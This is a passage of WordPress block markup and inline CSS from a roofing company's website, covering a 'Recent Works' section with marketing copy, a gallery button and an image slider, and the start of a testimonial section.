.responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"0bcd67a1-1acd-4911-bbab-bd2854964ee9\"} -->\n<style type=\"text/css\"> .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"15c717c2-2df6-496f-b0aa-89c7ee7b446a\"} -->\n<style type=\"text/css\"> .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-15c717c2-2df6-496f-b0aa-89c7ee7b446a\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"78c9592b-fe97-4617-9b42-3a70d0b149cd\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-78c9592b-fe97-4617-9b42-3a70d0b149cd\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"11786986-9ed9-4821-ad31-449ab6ed726b\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee\"} -->\n<style type=\"text/css\"> .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"0c0b2954-7402-4523-850f-a32279216940\"} -->\n<style type=\"text/css\"> .block-id-0c0b2954-7402-4523-850f-a32279216940 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-0c0b2954-7402-4523-850f-a32279216940 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-0c0b2954-7402-4523-850f-a32279216940 .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-0c0b2954-7402-4523-850f-a32279216940 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-88b7c69d-afcf-4d5a-b1c7-f7df39c7ad34.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7b7c381d-2ee6-49d3-980d-86ae77f3a19b\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading 